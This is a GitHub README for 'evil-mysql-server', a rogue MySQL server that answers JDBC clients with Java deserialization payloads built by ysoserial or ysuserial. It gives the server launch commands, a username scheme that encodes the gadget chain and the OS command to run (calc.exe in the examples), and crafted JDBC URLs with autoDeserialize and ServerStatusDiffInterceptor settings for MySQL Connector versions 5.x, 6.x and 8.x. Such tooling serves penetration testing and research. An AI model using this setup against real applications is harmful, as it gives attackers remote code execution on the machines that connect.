Light Mode

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

dushixiang/evil-mysql-server

Repository files navigation

evil mysql server

English | Jian Ti Zhong Wen

Introduction

evil-mysql-server is a malicious database written to target jdbc deserialization vulnerabilities and requires ysoserial.

Usage

ysoserial

./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial-0.0.6-SNAPSHOT-all.jar

After successful startup use jdbc to connect, where the username format is yso_payload_command, after successful connection evil-mysql-server will parse the username and generate malicious data back to the jdbc client using the following command.

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 calc.exe

ysuserial It's an enhanced project based on original ysoserial.

./evil-mysql-server -addr 3306 -java java -ysuserial ysuserial-0.9-su18-all.jar

After successful startup use jdbc to connect, where the username format is ysu_payload_command, after successful connection evil-mysql-server will parse the username and generate malicious data back to the jdbc client using the following command.

java -jar ysuserial-0.9-su18-all.jar -g CommonsCollections1 -p calc.exe

JDBC url examples

5.1.11-5.x

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe

6.x

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe

8.x

jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe

Thanks

Thanks to the following projects for the inspiration

About

evil-mysql-server is a malicious database written to target jdbc deserialization vulnerabilities and requires ysoserial.

Resources

Readme

Stars

Watchers

Forks

Packages

Contributors

Languages